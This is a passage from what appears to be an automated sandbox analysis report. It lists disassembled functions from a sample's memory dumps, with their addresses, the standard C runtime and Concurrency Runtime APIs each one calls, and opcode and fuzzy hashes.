                                                                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024B63F3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 78362717-0
                                                                                                                                                                                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction ID: 27135b7cb652ef6265316e3c59b4e04065e28b3d5c569a891c49cc10221611e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B01D636600114B7DF17EE65C850AEF779EDF55350F01045BEC21AB381DAB1ED118AB0
                                                                                                                                                                                                                                            Function 024B2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                              • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2250070497-0
                                                                                                                                                                                                                                            • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                            • Instruction ID: 98bbc2ef6c4a819673a9bd935fc39826533340a999af2b5411199a66d344df78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C117C76800604ABC715DF65C890ACAF7B9BF59320B014A1FE95A8B551DBB0E904CBA0
                                                                                                                                                                                                                                            Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 78362717-0
                                                                                                                                                                                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                            Function 024B2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                              • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2250070497-0
                                                                                                                                                                                                                                            • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                            • Instruction ID: 04b7ef5611412a3e6f83fff8b8e3c99265c916775d7181590b29daf7a5025c4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD011776400604ABC715DF6AC891EDAB7F9FF58320B008A1EE55A87650DBB0F944CB60
                                                                                                                                                                                                                                            Function 024950CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 024950D1
                                                                                                                                                                                                                                              • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 0249512B
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1836011271-0
                                                                                                                                                                                                                                            • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                            • Instruction ID: 5eb145ec457a884126c599b5249d2f305a822d70e51bdbe2bcda5e293ade1c3d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87018871D10208AFEF01EFA9D481B9DBBB1BF54315F50812FD055AB280CB749544CF95
                                                                                                                                                                                                                                            Function 02495B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 02495B8D
                                                                                                                                                                                                                                              • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02495BD8
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 02495BE7
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02495BF7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1836011271-0
                                                                                                                                                                                                                                            • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                            • Instruction ID: 76308099f333d1b1bb664119fadcda707349a68d7ef611e96cc11610f4682a43
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD019A71900208EFEF00EFA9D480BAEBBB1BF54315F20802FD055AB280CBB89944CF94
                                                                                                                                                                                                                                            Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                              • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1836011271-0
                                                                                                                                                                                                                                            • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                            • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                            Function 024AC13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC170
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC180
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC190
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC1A4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3973403980-0
                                                                                                                                                                                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction ID: d86c9070bf739f4af1e02929b4a024fd0d09b821d27c0afaf1be00be7cb3fbb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF01B67A504149BBDF929F94DC918AE3BA6AF35350F048517F91888170D732C6B1EF85
                                                                                                                                                                                                                                            Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3973403980-0
                                                                                                                                                                                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                            Function 024A3773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024A378C
                                                                                                                                                                                                                                              • Part of subcall function 024A2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024A2B2C
                                                                                                                                                                                                                                              • Part of subcall function 024A2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024A2B4B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A37A8
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A37BE
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A37CC
                                                                                                                                                                                                                                              • Part of subcall function 024A28EC: SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1674182817-0
                                                                                                                                                                                                                                            • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction ID: 81d91a01cb2e836bed8c616c328e87e10c7f04290d2964ef754f1e950751ffd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F027B6A002153AD720FB724C06FBB3A9C9F20740F50086FB905E2180FAD8D4009AB4
                                                                                                                                                                                                                                            Function 0249D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A1342
                                                                                                                                                                                                                                              • Part of subcall function 024A0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A0BD6
                                                                                                                                                                                                                                              • Part of subcall function 024A0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024A0BF7
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A1355
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A1361
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A136A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4284812201-0
                                                                                                                                                                                                                                            • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                            • Instruction ID: b688c43a0d78029303f3726da037d7ece2edc5ebd6e53a3e4cfd1592b8ff110b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0B431641704A7AF147EBA08316BE35975FB1314F04416FE51AAF3C0DFB19E059B94
                                                                                                                                                                                                                                            Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                              • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                              • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4284812201-0
                                                                                                                                                                                                                                            • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                            • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                            Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                              • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                              • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                              • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1674182817-0
                                                                                                                                                                                                                                            • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                            Function 024AD074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024AD088
                                                                                                                                                                                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024AD0AC
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024AD0BF
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024AD0CD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3657713681-0
                                                                                                                                                                                                                                            • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                            • Instruction ID: b0a4eca62322b1d84707fac2300e90fa9110b837576241020249691defa0fa32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF05935E04204E7C724FB16D862C9EB77A8EB0B18360852FD80517685DB31A90ACEA1
                                                                                                                                                                                                                                            Function 02495A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 02495A83
                                                                                                                                                                                                                                            • __Cnd_signal.LIBCPMT ref: 02495A8F
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 02495AA4
                                                                                                                                                                                                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02495AAB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2059591211-0
                                                                                                                                                                                                                                            • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                            • Instruction ID: 1d291883ecb988132d4ad8f1209f9f805ce79026a3dbe43b70d27fdf92383c51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0A031400701AFEF31BB73D80671A7BA2AF00328F14481FE05A969A0CFBAE8588E55
                                                                                                                                                                                                                                            Function 024A2858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
